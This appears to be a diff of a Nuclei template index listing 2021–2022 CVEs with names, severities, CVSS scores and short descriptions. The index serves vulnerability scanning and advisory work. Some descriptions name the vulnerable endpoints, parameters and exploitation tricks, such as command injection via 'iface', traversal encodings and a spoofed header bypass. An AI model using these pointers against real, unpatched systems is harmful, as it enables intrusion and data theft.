{"ID":"CVE-2021-26295","Info":{"Name":"Apache OFBiz \u003c17.12.06 - Arbitrary Code Execution","Severity":"critical","Description":"Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-26295.yaml"}
{"ID":"CVE-2021-26475","Info":{"Name":"EPrints 3.4.2 - Cross-Site Scripting","Severity":"medium","Description":"EPrints 3.4.2 contains a reflected cross-site scripting vulnerability via the cgi/cal URI.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-26475.yaml"}
{"ID":"CVE-2021-26598","Info":{"Name":"ImpressCMS \u003c1.4.3 - Incorrect Authorization","Severity":"medium","Description":"ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-26598.yaml"}
@ -1205,7 +1257,9 @@
{"ID":"CVE-2021-28854","Info":{"Name":"VICIdial Sensitive Information Disclosure","Severity":"high","Description":"VICIdial's Web Client is susceptible to information disclosure because it contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-28854.yaml"}
{"ID":"CVE-2021-28918","Info":{"Name":"Netmask NPM Package - Server-Side Request Forgery","Severity":"critical","Description":"Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-28918.yaml"}
{"ID":"CVE-2021-28937","Info":{"Name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","Severity":"high","Description":"Acexy Wireless-N WiFi Repeater REV 1.0 is vulnerable to password disclosure because the password.html page of the web management interface contains the administrator account password in plaintext.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-28937.yaml"}
{"ID":"CVE-2021-29006","Info":{"Name":"rConfig 3.9.6 - Local File Inclusion","Severity":"medium","Description":"rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-29006.yaml"}
{"ID":"CVE-2021-29156","Info":{"Name":"LDAP Injection In OpenAM","Severity":"high","Description":"OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29156.yaml"}
{"ID":"CVE-2021-29200","Info":{"Name":"Apache OFBiz \u003c 17.12.07 - Arbitrary Code Execution","Severity":"critical","Description":"Apache OFBiz has unsafe deserialization prior to 17.12.07 version An unauthenticated user can perform an RCE attack\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29200.yaml"}
{"ID":"CVE-2021-29203","Info":{"Name":"HPE Edgeline Infrastructure Manager \u003c1.22 - Authentication Bypass","Severity":"critical","Description":"HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22 contains an authentication bypass vulnerability which could be remotely exploited to bypass remote authentication and possibly lead to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29203.yaml"}
{"ID":"CVE-2021-29441","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"critical","Description":"This template only works on Nuclei engine prior to version 2.3.3 and version \u003e= 2.3.5.\n\nIn Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true)\nNacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that\nenables Nacos servers to bypass this filter and therefore skip authentication checks.\nThis mechanism relies on the user-agent HTTP header so it can be easily spoofed.\nThis issue may allow any user to carry out any administrative tasks on the Nacos server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-29441.yaml"}
{"ID":"CVE-2021-29442","Info":{"Name":"Nacos \u003c1.4.1 - Authentication Bypass","Severity":"high","Description":"Nacos before version 1.4.1 is vulnerable to authentication bypass because the ConfigOpsController lets the user perform management operations like querying the database or even wiping it out. While the /data/remove endpoint is properly protected with the @Secured annotation, the /derby endpoint is not protected and can be openly accessed by unauthenticated users. These endpoints are only valid when using embedded storage (derby DB) so this issue should not affect those installations using external storage (e.g. mysql).\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-29442.yaml"}
@ -1256,6 +1310,7 @@
{"ID":"CVE-2021-33357","Info":{"Name":"RaspAP \u003c=2.6.5 - Remote Command Injection","Severity":"critical","Description":"RaspAP 2.6 to 2.6.5 allows unauthenticated attackers to execute arbitrary OS commands via the \"iface\" GET parameter in /ajax/networking/get_netcfg.php, when the \"iface\" parameter value contains special characters such as \";\".\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-33357.yaml"}
{"ID":"CVE-2021-33544","Info":{"Name":"Geutebruck - Remote Command Injection","Severity":"high","Description":"Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2021/CVE-2021-33544.yaml"}
{"ID":"CVE-2021-33564","Info":{"Name":"Ruby Dragonfly \u003c1.4.0 - Remote Code Execution","Severity":"critical","Description":"Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-33564.yaml"}
{"ID":"CVE-2021-33690","Info":{"Name":"SAP NetWeaver Development Infrastructure - Server Side Request Forgery","Severity":"critical","Description":"Server-Side Request Forgery (SSRF) vulnerability has been detected in the SAP NetWeaver Development Infrastructure Component Build Service versions - 7.11, 7.20, 7.30, 7.31, 7.40, 7.50The SAP NetWeaver Development Infrastructure Component Build Service allows a threat actor who has access to the server to perform proxy attacks on server by sending crafted queries. Due to this, the threat actor could completely compromise sensitive data residing on the Server and impact its availability.Note: The impact of this vulnerability depends on whether SAP NetWeaver Development Infrastructure (NWDI) runs on the intranet or internet. The CVSS score reflects the impact considering the worst-case scenario that it runs on the internet.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2021/CVE-2021-33690.yaml"}
{"ID":"CVE-2021-3374","Info":{"Name":"Rstudio Shiny Server \u003c1.5.16 - Local File Inclusion","Severity":"medium","Description":"Rstudio Shiny Server prior to 1.5.16 is vulnerable to local file inclusion and source code leakage. This can be exploited by appending an encoded slash to the URL.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-3374.yaml"}
{"ID":"CVE-2021-3377","Info":{"Name":"npm ansi_up v4 - Cross-Site Scripting","Severity":"medium","Description":"npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-3377.yaml"}
{"ID":"CVE-2021-3378","Info":{"Name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","Severity":"critical","Description":"FortiLogger 4.4.2.2 is affected by arbitrary file upload issues. Attackers can send a \"Content-Type: image/png\" header to Config/SaveUploadedHotspotLogoFile and then Assets/temp/hotspot/img/logohotspot.asp.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-3378.yaml"}
@ -1271,8 +1326,10 @@
{"ID":"CVE-2021-34805","Info":{"Name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","Severity":"high","Description":"FAUST iServer before 9.0.019.019.7 is susceptible to local file inclusion because for each URL request it accesses the corresponding .fau file on the operating system without preventing %2e%2e%5c directory traversal.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-34805.yaml"}
{"ID":"CVE-2021-35250","Info":{"Name":"SolarWinds Serv-U 15.3 - Directory Traversal","Severity":"high","Description":"SolarWinds Serv-U 15.3 is susceptible to local file inclusion, which may allow an attacker access to installation and server files and also make it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-35250.yaml"}
{"ID":"CVE-2021-35265","Info":{"Name":"MaxSite CMS \u003e V106 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in MaxSite CMS before V106 via product/page/* allows remote attackers to inject arbitrary web script to a page.\"\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-35265.yaml"}
{"ID":"CVE-2021-35323","Info":{"Name":"Bludit 3.13.1 - Cross Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-35323.yaml"}
{"ID":"CVE-2021-35336","Info":{"Name":"Tieline IP Audio Gateway \u003c=2.6.4.8 - Unauthorized Remote Admin Panel Access","Severity":"critical","Description":"Tieline IP Audio Gateway 2.6.4.8 and below is affected by a vulnerability in the web administrative interface that could allow an unauthenticated user to access a sensitive part of the system with a high privileged account.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-35336.yaml"}
{"ID":"CVE-2021-35380","Info":{"Name":"TermTalk Server 3.24.0.2 - Local File Inclusion","Severity":"high","Description":"TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-35380.yaml"}
{"ID":"CVE-2021-35395","Info":{"Name":"RealTek Jungle SDK - Arbitrary Command Injection","Severity":"critical","Description":"There is a command injection vulnerability on the \"formWsc\" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-35395.yaml"}
{"ID":"CVE-2021-35464","Info":{"Name":"ForgeRock OpenAM \u003c7.0 - Remote Code Execution","Severity":"critical","Description":"ForgeRock AM server before 7.0 has a Java deserialization vulnerability in the jato.pageSession parameter on multiple pages.\nThe exploitation does not require authentication, and remote code execution can be triggered by sending a single crafted\n/ccversion/* request to the server. The vulnerability exists due to the usage of Sun ONE Application Framework (JATO)\nfound in versions of Java 8 or earlier.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-35464.yaml"}
{"ID":"CVE-2021-35488","Info":{"Name":"Thruk 2.40-2 - Cross-Site Scripting","Severity":"medium","Description":"Thruk 2.40-2 contains a cross-site scripting vulnerability via /thruk/#cgi-bin/status.cgi?style=combined\u0026title={TITLE] in the host or title parameter. An attacker can inject arbitrary JavaScript into status.cgi, leading to a triggered payload when accessed by an authenticated user.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-35488.yaml"}
{"ID":"CVE-2021-35587","Info":{"Name":"Oracle Access Manager - Remote Code Execution","Severity":"critical","Description":"The Oracle Access Manager portion of Oracle Fusion Middleware (component: OpenSSO Agent) is vulnerable to remote code execution. Supported versions that are affected are 11.1.2.3.0, 12.2.1.3.0 and 12.2.1.4.0. This is an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle Access Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-35587.yaml"}
@ -1356,6 +1413,7 @@
{"ID":"CVE-2021-41649","Info":{"Name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","Severity":"critical","Description":"An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-41649.yaml"}
{"ID":"CVE-2021-41653","Info":{"Name":"TP-Link - OS Command Injection","Severity":"critical","Description":"The PING function on the TP-Link TL-WR840N EU v5 router with firmware through TL-WR840N(EU)_V5_171211 is vulnerable to remote code execution via a specially crafted payload in an IP address input field.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-41653.yaml"}
{"ID":"CVE-2021-41691","Info":{"Name":"openSIS Student Information System 8.0 SQL Injection","Severity":"high","Description":"openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-41691.yaml"}
{"ID":"CVE-2021-41749","Info":{"Name":"CraftCMS SEOmatic - Server-Side Template Injection","Severity":"critical","Description":"In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-41749.yaml"}
{"ID":"CVE-2021-41773","Info":{"Name":"Apache 2.4.49 - Path Traversal and Remote Code Execution","Severity":"high","Description":"A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by \"require all denied\" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-41773.yaml"}
{"ID":"CVE-2021-41826","Info":{"Name":"PlaceOS 1.2109.1 - Open Redirection","Severity":"medium","Description":"PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-41826.yaml"}
{"ID":"CVE-2021-41878","Info":{"Name":"i-Panel Administration System 2.0 - Cross-Site Scripting","Severity":"medium","Description":"i-Panel Administration System 2.0 contains a cross-site scripting vulnerability that enables an attacker to execute arbitrary JavaScript code in the browser-based web console.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-41878.yaml"}
@ -1398,11 +1456,13 @@
{"ID":"CVE-2021-44528","Info":{"Name":"Open Redirect in Host Authorization Middleware","Severity":"medium","Description":"Specially crafted \"X-Forwarded-Host\" headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-44528.yaml"}
{"ID":"CVE-2021-44529","Info":{"Name":"Ivanti EPM Cloud Services Appliance Code Injection","Severity":"critical","Description":"Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44529.yaml"}
{"ID":"CVE-2021-44848","Info":{"Name":"Thinfinity VirtualUI User Enumeration","Severity":"medium","Description":"Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-44848.yaml"}
{"ID":"CVE-2021-44910","Info":{"Name":"SpringBlade - Information Leakage","Severity":"high","Description":"SpringBlade is a comprehensive project upgraded and optimized from a commercial-grade project, featuring both a SpringCloud distributed microservice architecture and a SpringBoot monolithic microservice architecture. The SpringBlade framework has a default SIGN_KEY, which can be exploited by attackers to obtain sensitive information such as user account password logs.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-44910.yaml"}
{"ID":"CVE-2021-45043","Info":{"Name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","Severity":"high","Description":"Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45043.yaml"}
{"ID":"CVE-2021-45046","Info":{"Name":"Apache Log4j2 - Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-45046.yaml"}
{"ID":"CVE-2021-45092","Info":{"Name":"Thinfinity Iframe Injection","Severity":"critical","Description":"A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the \"vpath\" parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45092.yaml"}
{"ID":"CVE-2021-45232","Info":{"Name":"Apache APISIX Dashboard \u003c2.10.1 - API Unauthorized Access","Severity":"critical","Description":"In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45232.yaml"}
{"ID":"CVE-2021-45380","Info":{"Name":"AppCMS - Cross-Site Scripting","Severity":"medium","Description":"AppCMS 2.0.101 has a cross-site scripting vulnerability in \\templates\\m\\inc_head.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-45380.yaml"}
{"ID":"CVE-2021-45382","Info":{"Name":"D-Link - Remote Command Execution","Severity":"critical","Description":"A Remote Command Execution (RCE) vulnerability exists in all series H/W revisions D-link DIR-810L, DIR-820L/LW, DIR-826L, DIR-830L, and DIR-836L routers via the DDNS function in ncc2 binary file\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45382.yaml"}
{"ID":"CVE-2021-45422","Info":{"Name":"Reprise License Manager 14.2 - Cross-Site Scripting","Severity":"medium","Description":"Reprise License Manager 14.2 contains a cross-site scripting vulnerability in the /goform/activate_process \"count\" parameter via GET.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-45422.yaml"}
{"ID":"CVE-2021-45428","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","Severity":"critical","Description":"TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45428.yaml"}
{"ID":"CVE-2021-45967","Info":{"Name":"Pascom CPS Server-Side Request Forgery","Severity":"critical","Description":"Pascom versions before 7.20 packaged with Cloud Phone System contain a known server-side request forgery vulnerability.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45967.yaml"}
@ -1421,6 +1481,7 @@
{"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"}
{"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"}
{"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"}
{"ID":"CVE-2022-0087","Info":{"Name":"Keystone 6 Login Page - Open Redirect and Cross-Site Scripting","Severity":"medium","Description":"On the login page, there is a \"from=\" parameter in URL which is vulnerable to open redirect and can be escalated to reflected XSS.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-0087.yaml"}
{"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"}
{"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0147.yaml"}
{"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0148.yaml"}
@ -1435,11 +1496,12 @@
{"ID":"CVE-2022-0212","Info":{"Name":"WordPress Spider Calendar \u003c=1.5.65 - Cross-Site Scripting","Severity":"medium","Description":"WorsPress Spider Calendar plugin through 1.5.65 is susceptible to cross-site scripting. The plugin does not sanitize and escape the callback parameter before outputting it back in the page via the window AJAX action, available to both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0212.yaml"}
{"ID":"CVE-2022-0218","Info":{"Name":"HTML Email Template Designer \u003c 3.1 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0218.yaml"}
{"ID":"CVE-2022-0220","Info":{"Name":"WordPress GDPR \u0026 CCPA \u003c1.9.27 - Cross-Site Scripting","Severity":"medium","Description":"WordPress GDPR \u0026 CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an \"application/json\" content-type, and JavaScript code may be executed on a victim's browser.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0220.yaml"}
{"ID":"CVE-2022-0228","Info":{"Name":"Popup Builder \u003c 4.0.7 - SQL Injection","Severity":"high","Description":"The Popup Builder WordPress plugin before 4.0.7 does not validate and properly escape the orderby and order parameters before using them in a SQL statement in the admin dashboard, which could allow high privilege users to perform SQL injection.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2022/CVE-2022-0228.yaml"}
{"ID":"CVE-2022-0234","Info":{"Name":"WordPress WOOCS \u003c 1.3.7.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WOOCS plugin before 1.3.7.5 is susceptible to cross-site scripting. The plugin does not sanitize and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action, available to both unauthenticated and authenticated users, before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0234.yaml"}
{"ID":"CVE-2022-0271","Info":{"Name":"LearnPress \u003c4.1.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0271.yaml"}
{"ID":"CVE-2022-0281","Info":{"Name":"Microweber Information Disclosure","Severity":"high","Description":"Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0281.yaml"}
{"ID":"CVE-2022-0288","Info":{"Name":"WordPress Ad Inserter \u003c2.7.10 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0288.yaml"}
{"ID":"CVE-2022-0342","Info":{"Name":"Zyxel - Authentication Bypass","Severity":"critical","Description":"An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-0342.yaml"}
{"ID":"CVE-2022-0342","Info":{"Name":"Zyxel - Authentication Bypass","Severity":"critical","Description":"An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0342.yaml"}
{"ID":"CVE-2022-0346","Info":{"Name":"WordPress XML Sitemap Generator for Google \u003c2.0.4 - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0346.yaml"}
{"ID":"CVE-2022-0349","Info":{"Name":"WordPress NotificationX \u003c2.3.9 - SQL Injection","Severity":"critical","Description":"WordPress NotificationX plugin prior to 2.3.9 contains a SQL injection vulnerability. The plugin does not sanitize and escape the nx_id parameter before using it in a SQL statement, leading to an unauthenticated blind SQL injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0349.yaml"}
{"ID":"CVE-2022-0378","Info":{"Name":"Microweber Cross-Site Scripting","Severity":"medium","Description":"Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0378.yaml"}
@ -1452,14 +1514,18 @@
{"ID":"CVE-2022-0437","Info":{"Name":"karma-runner DOM-based Cross-Site Scripting","Severity":"medium","Description":"NPM karma prior to 6.3.14. contains a DOM-based cross-site Scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0437.yaml"}
{"ID":"CVE-2022-0441","Info":{"Name":"MasterStudy LMS \u003c2.7.6 - Improper Access Control","Severity":"critical","Description":"WordPress MasterStudy LMS plugin before 2.7.6 is susceptible to improper access control. The plugin does not validate some parameters given when registering a new account, which can allow an attacker to register as an admin, thus potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0441.yaml"}
{"ID":"CVE-2022-0482","Info":{"Name":"Easy!Appointments \u003c1.4.3 - Broken Access Control","Severity":"critical","Description":"Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-0482.yaml"}
{"ID":"CVE-2022-0533","Info":{"Name":"Ditty (formerly Ditty News Ticker) \u003c 3.0.15 - Cross-Site Scripting","Severity":"medium","Description":"The Ditty (formerly Ditty News Ticker) WordPress plugin before 3.0.15 is affected by a Reflected Cross-Site Scripting (XSS) vulnerability.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0533.yaml"}
